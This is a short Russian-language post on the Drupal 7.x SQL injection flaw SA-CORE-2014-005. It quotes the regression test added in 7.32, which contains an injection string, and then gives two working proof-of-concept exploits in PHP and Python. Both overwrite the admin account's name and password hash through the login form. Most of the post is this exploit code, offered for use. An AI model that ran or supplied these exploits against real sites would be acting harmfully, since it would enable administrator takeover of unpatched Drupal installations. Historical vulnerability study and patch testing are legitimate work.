Что происходит с 7.32 Проверяя модуль тестирования. Вы можете видеть, что следующий тест был добавлен к 7.32;
+
+ /**
+ * Test SQL injection via database query array arguments.
+ */
+ public function testArrayArgumentsSQLInjection() {
+ // Attempt SQL injection and verify that it does not work.
+ $condition = array(
+ "1 ;INSERT INTO {test} SET name = 'test12345678'; -- " => '',
+ '1' => '',
+ );
+ try {
+ db_query("SELECT * FROM {test} WHERE name = :name", array(':name' => $condition))->fetchObject();
+ $this->fail('SQL injection attempt via array arguments should result in a PDOException.');
+ }
+ catch (PDOException $e) {
+ $this->pass('SQL injection attempt via array arguments should result in a PDOException.');
+ }
+
+ // Test that the insert query that was used in the SQL injection attempt did
+ // not result in a row being inserted in the database.
+ $result = db_select('test')
+ ->condition('name', 'test12345678')
+ ->countQuery()
+ ->execute()
+ ->fetchField();
+ $this->assertFalse($result, 'SQL injection attempt did not result in a row being inserted in the database table.');
+ }
+
Это должно дать некоторое дополнительное представление о том, как создать атаку.
Подтверждение концепции
Так как прошло более чем достаточно времени, и в дикой природе полно PoC.
Poc # 1 - PHP
<?php
$url = 'http://www.example.com'; // URL of the website (http://domain.com/)
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
Poc # 2 Python - http://pastebin.com/nDwLFV3v
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
+user \
+"'+,+pass+%3d+'" \
+hash[:55] \
+"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
Вот блог, который делает хороший разбивку: http://www.volexity.com/blog/?p=83